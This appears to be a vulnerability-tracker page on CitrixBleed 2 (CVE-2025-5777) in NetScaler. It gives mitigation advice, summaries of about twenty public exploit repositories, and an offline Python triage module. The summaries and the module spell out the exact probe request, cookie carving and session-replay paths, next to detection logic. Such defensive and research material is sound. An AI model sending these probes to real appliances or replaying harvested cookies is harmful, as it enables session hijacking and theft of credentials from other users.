CitrixBleed 2
CVE-2025-5777, also referred to as CitrixBleed 2, is an out-of-bounds read (memory over-read) vulnerability in Citrix NetScaler ADC and NetScaler Gateway. The flaw stems from insufficient input validation in the authentication request handler and is reachable without credentials whenever the appliance is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN or RDP Proxy) or as an AAA virtual server. Every exploit tracked below hits the same endpoint, /p/u/doAuthentication.do, with a POST body that names the login parameter without assigning it a value (the literal string 'login'); the appliance then echoes bytes of uninitialized memory back inside the <InitialValue> element of its XML response. Because that memory belongs to the authentication process, it can contain live NSC_AAAC session cookies, usernames, credentials and MFA tokens belonging to other users, which is what turns a read-only bug into a session-hijacking primitive.
Impact, mitigation & remediation
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
Impact
What an attacker gets, and what they've been doing with it. Each successful request returns a slice of appliance memory, and repeated requests harvest more; the tools below pull NSC_AAAC session cookies, usernames, credentials and MFA tokens out of the leaked bytes, and two of them replay recovered cookies against protected paths (/vpn/index.html, /Citrix/StoreWeb/, /logon/LogonPoint/Authentication/GetUserName) to take over sessions without going through the login flow. In the STAC3725 campaign the bug was the initial access vector; the attackers then installed ScreenConnect and deployed QEMU-based tooling.
Mitigation
If you can't patch tonight, do this now. The trigger is unauthenticated and needs only HTTPS reachability to a Gateway or AAA virtual server, so restrict which networks can reach those virtual servers, and block or alert on POST requests to /p/u/doAuthentication.do whose body carries the login parameter with no value (the Snort and Fortigate IPS rules referenced in the exploit material below key on exactly this).
Remediation
Patch, then assume compromise. Upgrading stops new leaks but does nothing about sessions already lifted from memory, so after the upgrade terminate all active ICA and PCoIP sessions (Citrix's guidance is kill icaconnection -all and kill pcoipConnection -all on the appliance CLI), force users to re-authenticate, rotate any credentials that may have transited the appliance while it was exposed, and review the appliance logs for binary garbage in request fields, which several of the tools below use as an exploitation indicator.
Exploits
20 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
This repository is a very small proof-of-concept exploit for CVE-2025-5777, described as a Citrix NetScaler memory leak ('Citrixbleed 2'). It contains only two files: a minimal README and a single Python script, poc.py, which is the sole functional component and clear entry point. The exploit is a network-based asynchronous PoC written in Python using aiohttp, asyncio, argparse, regex parsing, and colorized console output via colorama. The operator provides a base URL for a suspected Citrix target. The script appends the fixed path /p/u/doAuthentication.do and repeatedly issues concurrent HTTP POST requests with body data 'login' and a crafted User-Agent header ('CloudSEKPoc' repeated 10 times). SSL verification is explicitly disabled, and an optional HTTP proxy can be used. Its main capability is information disclosure extraction, not remote code execution. After each response, the script checks for HTTP 200 and scans the body for an <InitialValue>...</InitialValue> tag. If found, it treats the enclosed content as leaked memory-derived data and prints it as a hex/ascii dump. The script performs an initial round of requests to determine whether leakage is observed; if not, it stops and reports the target is likely not vulnerable. If leakage is detected once, it continues looping to extract more data until interrupted. Repository structure and purpose: - README.md: only identifies the repo as 'Citrixbleed2-CVE-2025-5777' and 'POC'. - poc.py: full exploit logic, including signal handling, concurrent request generation, response parsing, leak detection state tracking, and CLI argument handling. Overall, this is a genuine PoC exploit for a memory disclosure vulnerability in Citrix NetScaler/ADC/Gateway authentication handling. It is not merely a detector because it actively attempts to trigger and retrieve leaked content, though it remains a basic proof-of-concept rather than a weaponized framework module.
Repository contains a single Python proof-of-concept exploit script (citrixbleed2.py) plus a README describing 'CitrixBleed 2' (CVE-2025-5777) as a remote, unauthenticated memory disclosure affecting Citrix NetScaler ADC/Gateway. Code behavior (citrixbleed2.py): - Takes a target base URL from the command line (e.g., https://target) and constructs a fixed endpoint: /p/u/doAuthentication.do. - Sends up to 100 HTTPS POST requests (verify=False, timeout=5) with a deliberately long User-Agent string ("GROKCTF" repeated 50 times) as a marker, Content-Length set to 5, and Connection: keep-alive; body is the bytes string "login". - Parses each response body for XML-like tags <InitialValue>...</InitialValue> and prints the extracted content as "RAW LEAK" (truncated to 200 chars for display). - Applies simple heuristics to highlight potentially interesting leaked data (strings containing '{' / 'flag{' or strings longer than 30 chars as possible tokens/sessions). Overall purpose: a network-based PoC intended to demonstrate/harvest memory disclosure artifacts from a vulnerable Citrix authentication endpoint by repeatedly issuing crafted requests and extracting leaked values from the server response.
This repository contains a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical memory disclosure vulnerability affecting Citrix NetScaler ADC and NetScaler Gateway devices prior to the June/July 2025 patches. The exploit is implemented in a single Python script (CVE-2025-5777.py) and is accompanied by a detailed README.md that explains the vulnerability, affected products, impact, and usage instructions. The exploit works by sending repeated malformed POST requests to the /p/u/doAuthentication.do endpoint of a target NetScaler device. The server's response is parsed for an <InitialValue> XML tag, which may contain leaked memory data. The script displays this data in a hex-dump format, similar to the output of the xxd tool. The exploit supports optional proxying, threading, and verbose output for analysis. No authentication is required to exploit the vulnerability, making it highly critical. The README provides context, usage instructions, and sample output, demonstrating the ability to leak sensitive memory contents such as session tokens and credentials. The repository is structured simply, with one exploit script and one documentation file, and is intended for educational and research purposes only.
This repository provides a comprehensive exploit and scanner for CVE-2025-5777, a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway products. The main exploit script, 'cve5777expolit.py', is a Python 3 tool that uses asynchronous requests (aiohttp) to target the /p/u/doAuthentication.do endpoint on Citrix NetScaler devices. By sending a crafted POST request with the body 'login', the script attempts to trigger a memory leak, then parses the response for sensitive data, including session cookies (notably NSC_AAAC), usernames, and other human-readable strings. Extracted leaks are displayed and saved to 'leaks.txt'. The tool supports scanning single or multiple targets, uses concurrency for speed, and highlights high-impact findings. The repository also includes a .bcheck script and a Nuclei-compatible YAML file for detection, as well as a detailed README.md explaining the vulnerability, usage, and references. The exploit is operational, providing both detection and practical exploitation capabilities for authorized testing of Citrix NetScaler devices vulnerable to CVE-2025-5777.
This repository contains an advanced Python exploit script (exploit.py) targeting CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler appliances. The exploit abuses improper handling of malformed POST data to leak uninitialized stack memory via the <InitialValue> tag in XML responses from authentication endpoints (notably /p/u/doAuthentication.do and optionally /api/auth). The script is highly automated: it supports concurrency, proxying, rate limiting, and can test multiple endpoints. It detects and highlights sensitive data patterns (session tokens, credentials, IPs, emails, etc.), tracks statistics, and saves results in various formats (JSON, CSV, raw text). The README provides detailed usage instructions, options, and describes the impact and mitigation. The repository structure is simple: a disclaimer, a comprehensive README, and the exploit script. The exploit is operational and can be used to extract sensitive data from vulnerable Citrix NetScaler instances.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a memory disclosure vulnerability (dubbed 'CitrixBleed 2') affecting Citrix NetScaler Gateway and AAA Virtual Server. The repository contains three files: a Bash script (CVE-2025-5777.sh) that demonstrates the exploit, a README.md with detailed usage instructions and background, and a LICENSE file. The exploit works by sending a specially crafted POST request to the '/p/u/doAuthentication.do' endpoint of a target Citrix device over HTTPS. The README attributes the leak to insufficient input validation and a TOCTOU race condition; the race-condition claim is not shared by the other write-ups on this page, which describe a straightforward read of uninitialized memory, so treat it as the author's interpretation rather than an established root cause. The README also provides context on asset discovery, exploitation methodology, and references for further research. The exploit is unauthenticated and external, requiring only the target domain as input. If successful, it may expose sensitive information such as session cookies or credentials from the target's memory.
This repository provides a Python-based proof-of-concept exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler. The main file, CVE-2025-5777.py, is a command-line tool that sends repeated POST requests to the /p/u/doAuthentication.do endpoint of a specified Citrix NetScaler device. If the device is vulnerable, the script extracts and displays leaked memory data found within the <InitialValue> XML tag in the HTTP response. The script includes features for verbose output, proxy support, IPv4-only mode, and improved error handling for DNS and URL format issues. The README.md provides usage instructions and context, while requirements.txt lists the necessary Python dependencies (aiohttp and colorama). The exploit demonstrates the vulnerability by leaking memory but does not provide weaponized or post-exploitation capabilities.
This repository provides an operational exploit for CVE-2025-5777, a vulnerability affecting Citrix NetScaler VPN. The main script, exploit.py, is an asynchronous Python tool that targets Citrix VPN endpoints by sending POST requests to the /p/u/doAuthentication.do path. It analyzes the responses for leaked authentication tokens (including <InitialValue> tags, NSC_AAAC cookies, and JWTs), internal IP addresses, and hidden or internal VPN paths. The tool can also validate the extracted tokens by attempting to access several protected paths (such as /vpn/index.html and /Citrix/StoreWeb/) using the tokens as cookies. The output can be saved in JSON format or to a file, and the tool supports proxying through Burp Suite or SOCKS proxies. The repository is structured with a single main exploit script (exploit.py), a requirements.txt for dependencies, and a detailed README.md explaining usage, features, and legal disclaimers. The exploit is intended for educational and authorized research use only.
This repository contains a single Python script, 'exploit.py', which is a proof-of-concept exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler devices. The script uses asynchronous HTTP POST requests to the '/p/u/doAuthentication.do' endpoint on a target NetScaler device, attempting to trigger a memory disclosure. It parses the response for leaked data, specifically looking for <InitialValue> tags, and displays the extracted memory contents in a hex dump format. The script supports multithreading, proxy configuration, and verbose output. It is intended for educational and testing purposes, and requires the user to supply the base URL of the target device. The exploit demonstrates the vulnerability by extracting sensitive memory data if the target is affected.
This repository contains a proof-of-concept (PoC) exploit labelled CVE-2025-5777 but describing a critical authentication bypass and remote code execution vulnerability in Trend Micro Apex Central (versions prior to Patch 2379). The exploit is implemented in a single Python script ('cve-2025-5777-poc.py'), which sends a crafted HTTP POST request to the endpoint '/TrendMicro/EndpointBaseCamp/UI/Login.aspx' on the target system. The payload includes a 'cmd' parameter that is injected into the request, allowing the attacker to execute arbitrary system commands with SYSTEM/root privileges. The script checks the response for evidence of successful command execution (e.g., output from the 'ping' command). No authentication is required, and the attack is performed remotely over the network. The repository also includes a README with detailed usage instructions, mitigation advice, and references. No hardcoded IP addresses or external domains are present in the code; the target URL and command are provided as script arguments. The exploit is a functional PoC and not weaponized for mass exploitation. Note that this description does not match the CVE: CVE-2025-5777 is the NetScaler memory over-read covered throughout this page, not a Trend Micro product flaw, so the repository is either mislabelled or misattributed and is not usable against NetScaler targets.
This repository provides a comprehensive exploit and scanner for CVE-2025-5777 (CitrixBleed 2), a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway products. The main exploit script, 'exploitveer.py', is a Python 3 tool that uses asynchronous requests (aiohttp) to target the vulnerable authentication endpoint '/p/u/doAuthentication.do' on Citrix NetScaler devices. By sending a crafted POST request with the body 'login', the script triggers the vulnerability, causing the server to leak memory contents within an <InitialValue> tag in the response. The script then parses the leaked data, extracting human-readable strings and searching for sensitive patterns such as session cookies (NSC_AAAC), credentials, and MFA tokens. All findings are displayed to the user and saved in 'leaks.txt' for further analysis. The tool supports both single-target and multi-target scanning, can operate through a proxy, and offers a check-only mode for quick vulnerability assessment. The repository also includes detection scripts in .bcheck and .yaml formats for integration with automated scanners, as well as a detailed README with usage instructions, references, and search dorks for identifying potential targets. The exploit is operational, providing real-world impact demonstration and data extraction capabilities.
This repository contains a Python proof-of-concept exploit for CVE-2025-5777, targeting a Citrix authentication endpoint. The main file, CVE-2025-5777.py, sends a POST request with the body 'login' to the /p/u/doAuthentication.do endpoint of a specified target. If the response is XML with a specific Content-Type, the script extracts the <InitialValue> field, decodes it from base64, and prints its contents in both hex and ASCII formats. The exploit then repeats the request 20 more times, likely to gather additional data or tokens. The script supports both single-target and list-based modes. The README provides usage instructions and a sample HTTP request. No hardcoded IPs or domains are present; the endpoint is relative and must be supplied by the user. The exploit is a POC and does not provide a weaponized payload, but it demonstrates the ability to extract potentially sensitive authentication data from vulnerable Citrix systems.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway appliances. The main exploit is implemented in 'CVE-2025-5777.py', a Python script that uses asynchronous HTTP POST requests to the '/p/u/doAuthentication.do' endpoint on the target system. If the target is vulnerable, the response will contain leaked memory, specifically within an <InitialValue> XML tag, which the script extracts and displays as a hex dump. The script supports concurrency, proxying, and verbose output. The included YAML file ('CVE-2025-5777.yaml') is a nuclei template for automated scanning of the same vulnerability. The repository is structured with a README providing usage instructions, a LICENSE, and standard .gitignore. The exploit is a functional PoC, not weaponized, and is intended for authorized security testing only.
This repository contains a proof-of-concept exploit for CVE-2025-5777 (CitrixBleed 2), a critical memory disclosure vulnerability in Citrix NetScaler ADC/Gateway devices. The main exploit script, 'citrix_memory_leak.py', is a standalone Python 3 tool that sends a malformed POST request to the '/p/u/doAuthentication.do' endpoint of a target Citrix device. If the device is vulnerable, the response will contain leaked memory within an <InitialValue> XML tag, which the script extracts and displays as a hex+ASCII dump. The exploit is asynchronous, supports up to 10 requests per run, and provides colored terminal output for clarity. The repository also includes a README with usage instructions, mitigation advice, and references, as well as a detailed legal disclaimer. No hardcoded targets or credentials are present; the user must supply the target URL. The exploit is intended for authorized security testing and educational purposes only.
This repository contains a PowerShell proof-of-concept exploit for CVE-2025-5777. The main file, 'powershell-poc', is an interactive script that prompts the user for a target URL and an output filename. It repeatedly sends POST requests to the /p/u/doAuthentication.do endpoint of the specified URL, attempting to extract data enclosed in <InitialValue>...</InitialValue> tags from the server's response. Any extracted data is saved to a local file (default: leak.dump). The script is designed for internal testing and demonstrates the vulnerability by leaking potentially sensitive information from the target application. The repository structure is minimal, consisting of a README and the exploit script.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a memory leak vulnerability in Citrix NetScaler appliances. The exploit is implemented in a single Python script ('exploit.py'), which sends repeated malformed HTTP POST requests to the '/p/u/doAuthentication.do' endpoint of a target NetScaler device. The POST data consists solely of the string 'login', which, due to improper parsing on the target, causes the server to return a portion of uninitialized stack memory within the <InitialValue> tag of the XML response. The script parses these responses and displays the leaked memory in a hex-dump format, potentially exposing sensitive information such as session tokens, credentials, and other in-memory data. The repository also includes a README.md with detailed usage instructions, impact analysis, and references, as well as a legal disclaimer. The exploit is intended for educational and research purposes only and is not weaponized; it serves as a PoC to demonstrate the vulnerability and assist in detection and analysis.
This repository provides a proof-of-concept (POC) and a checker script for exploiting CVE-2025-5777, a vulnerability in Citrix ADC / Gateway devices. The main files are 'checker.py' and 'poc.py'. - 'checker.py' is a multi-threaded script that takes a list of target hosts and checks if they are vulnerable by sending POST requests to '/p/u/doAuthentication.do' and analyzing the response for specific XML tags. It writes vulnerable hosts to an output file. - 'poc.py' is a more advanced exploit that can target a single URL or a list of URLs. It attempts to dump memory from the target by exploiting the same endpoint, parses the response for session tokens, and tests if these tokens are valid by using them as cookies in requests to '/logon/LogonPoint/Authentication/GetUserName'. If successful, it reports the vulnerability and any valid session tokens/usernames found. The repository includes requirements files for dependencies and an OpenSSL configuration file to enable legacy renegotiation if needed. The exploit is operational and can be used to confirm vulnerability and extract sensitive session information from affected Citrix devices.
This repository is a proof-of-concept exploit for CVE-2025-5777 (CitrixBleed 2), an out-of-bounds read vulnerability in the login process of Citrix Gateway. The main script (main.py) is a Python program that takes a target URL and optional parameters for threading and output file. It sends crafted POST requests to the /p/u/doAuthentication.do endpoint of the target Citrix Gateway, attempting to trigger the vulnerability and extract memory contents. The script uses multithreading to increase the rate of exploitation and writes any leaked memory data to a specified output file, displaying progress in the terminal. The exploit is not weaponized but demonstrates the vulnerability and potential for sensitive data leakage. The repository includes a README with usage instructions and a requirements.txt listing necessary Python packages.
This repository provides a proof-of-concept (PoC) exploit for CVE-2025-5777, a critical unauthenticated out-of-bounds read vulnerability in Citrix NetScaler ADC and Gateway appliances. The main exploit script, 'CVE-2025-5777.py', sends 100 concurrent POST requests with a minimal body ('login') to the '/p/u/doAuthentication.do' endpoint of a specified target host over HTTPS. If the target is vulnerable, the response may contain leaked memory between <InitialValue>...</InitialValue> tags, which the script extracts and saves as binary files for further analysis. The exploit does not require authentication and targets unpatched Citrix NetScaler systems, potentially exposing sensitive information such as session tokens. The repository also includes 'ns_log_scanner.py', a utility script for analyzing Citrix NetScaler log files to detect non-text (binary) data, which may indicate exploitation or memory leaks. The README provides detailed background on the vulnerability, affected versions, detection strategies (including example Snort and Fortigate IPS rules), and usage instructions for both scripts. The overall structure is clear, with the main exploit and a supporting detection tool, both written in Python. No hardcoded IPs or domains are present; the exploit requires the user to specify the target host.
This repository provides a comprehensive exploitation toolkit and documentation for CVE-2025-5777 (CitrixBleed 2), an out-of-bounds memory read vulnerability in Citrix NetScaler ADC and Gateway. The repository contains three files: a detailed README.md (with technical background, exploitation details, and references), poc.py (a proof-of-concept script that triggers the vulnerability and extracts leaked memory, including session cookies), and exp.py (an exploit script that replays leaked session cookies to gain unauthorized access to the target's VPN portal). The main attack vector is network-based, requiring only HTTPS access to the vulnerable endpoint. The PoC and exploit scripts are written in Python and are operational, providing both memory leakage and session hijacking capabilities. No detection-only scripts are present; both code files are offensive in nature. The repository is not part of a known exploit framework.
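The write-ups above all describe the same mechanics (a POST to /p/u/doAuthentication.do whose body is the bare token login, with leaked memory coming back inside <InitialValue>) and several of them bolt on detection (scanning logs for binary data, IPS rules, validating carved cookies). The following is an added example, not code from any of the repositories listed, that puts both halves into one module that runs offline: it builds the probe request byte for byte, classifies a response by whether <InitialValue> contains non-printable bytes, carves NSC_AAAC cookie values out of the leaked slice, prints the xxd-style dump most of the PoCs use, and on the defensive side flags probe requests by their value-less login parameter. The XML skeleton and the leaked bytes are constructed for the example and are not captured appliance traffic; the 20-character minimum for a cookie value is an assumption.

```python
"""Offline triage helpers for CVE-2025-5777 (CitrixBleed 2).

Added example, not code from any of the repositories described above. The
request and response samples below are constructed to mirror what those
write-ups describe; they are not captured appliance traffic.
"""
import re
import string
from typing import Optional

ENDPOINT = "/p/u/doAuthentication.do"
INITIAL_VALUE_RE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.DOTALL)
# NSC_AAAC values in the PoC output are long base64-like strings; the
# 20-character floor is an assumption chosen to avoid matching noise.
NSC_AAAC_RE = re.compile(rb"NSC_AAAC=([A-Za-z0-9+/=]{20,})")
PRINTABLE = set(string.printable.encode())


def build_probe(host: str) -> bytes:
    """Raw HTTP/1.1 request the PoCs send. The body is the bare parameter
    name 'login' with no '=' and no value, which is what leaves the
    server-side buffer uninitialised before it is echoed back."""
    body = b"login"
    return (
        b"POST " + ENDPOINT.encode() + b" HTTP/1.1\r\n"
        + b"Host: " + host.encode() + b"\r\n"
        + b"Content-Type: application/x-www-form-urlencoded\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        + b"Connection: keep-alive\r\n\r\n"
        + body
    )


def is_probe_request(method: str, path: str, body: bytes) -> bool:
    """Request-side detection: a POST to the auth endpoint whose form body
    carries 'login' as a parameter name with no value separator."""
    if method.upper() != "POST" or not path.startswith(ENDPOINT):
        return False
    params = [p for p in body.split(b"&") if p]
    return any(p.strip() == b"login" and b"=" not in p for p in params)


def extract_initial_value(response_body: bytes) -> Optional[bytes]:
    """Pull the <InitialValue> element the exploits scrape from the XML."""
    m = INITIAL_VALUE_RE.search(response_body)
    return m.group(1) if m else None


def looks_like_leak(value: bytes) -> bool:
    """An unaffected appliance returns an empty value or echoes a submitted
    login name. Any byte outside printable ASCII means raw memory."""
    return any(b not in PRINTABLE for b in value)


def find_session_cookies(value: bytes) -> list:
    """Carve NSC_AAAC cookie values out of a leaked memory slice."""
    return [m.group(1).decode() for m in NSC_AAAC_RE.finditer(value)]


def hexdump(data: bytes, width: int = 16) -> str:
    """xxd-style dump, the format most of the PoCs print."""
    out = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(width * 3 - 1)
        asc = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        out.append(f"{off:08x}  {hexpart}  |{asc}|")
    return "\n".join(out)


def triage(response_body: bytes) -> dict:
    """One-call verdict on a captured response body."""
    value = extract_initial_value(response_body)
    leak = value is not None and looks_like_leak(value)
    return {
        "leak": leak,
        "bytes": len(value) if value else 0,
        "cookies": find_session_cookies(value) if leak else [],
    }


# Constructed samples. The XML skeleton follows the AuthenticateResponse
# shape the write-ups quote; the leaked bytes are invented and carry a fake
# cookie so the carving path is exercised.
LEAKED = (b"\x00\x10\x7f\xcc\x90\xe8 NSC_AAAC="
          b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcd; Path=/\x00\xde\xad")


def _response(initial_value: bytes) -> bytes:
    head = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b"<AuthenticateResponse><Status>success</Status>"
            b"<AuthenticationRequirements><Requirements><Requirement>"
            b"<Credential><ID>login</ID><Type>username</Type></Credential>"
            b"<Input><Text><InitialValue>")
    tail = (b"</InitialValue></Text></Input></Requirement></Requirements>"
            b"</AuthenticationRequirements></AuthenticateResponse>")
    return head + initial_value + tail


SAMPLE_LEAKY_RESPONSE = _response(LEAKED)
SAMPLE_PATCHED_RESPONSE = _response(b"")

if __name__ == "__main__":
    print(build_probe("gateway.example.com").decode(errors="replace"))
    verdict = triage(SAMPLE_LEAKY_RESPONSE)
    print(verdict)
    if verdict["leak"]:
        print(hexdump(extract_initial_value(SAMPLE_LEAKY_RESPONSE)))
    print(triage(SAMPLE_PATCHED_RESPONSE))
    print(is_probe_request("POST", ENDPOINT, b"login"),
          is_probe_request("POST", ENDPOINT, b"login=alice&passwd=secret"))
```

The non-printable-byte heuristic in looks_like_leak is the same signal the ns_log_scanner described above looks for in appliance logs, just applied to a response instead of a log line; is_probe_request is the request-side counterpart an IPS or WAF rule would implement, and it deliberately ignores a normal login where login=alice is present.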
Affected products & vendors
Citrix NetScaler ADC and NetScaler Gateway, when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server. Specific CPE configurations and version ranges are not reproduced on this page.
Recent activity
375 sources tracked across advisories, community write-ups, and news.
CitrixBleed 2 was the initial access vector in the STAC3725 campaign against NetScaler ADC and Gateway instances; once inside, the attackers installed ScreenConnect and deployed QEMU-based tooling. Active exploitation is the reason the bug is flagged as requiring immediate patching.
Citrix Bleed 2, a previously exploited vulnerability referenced for similarity to CVE-2026-3055.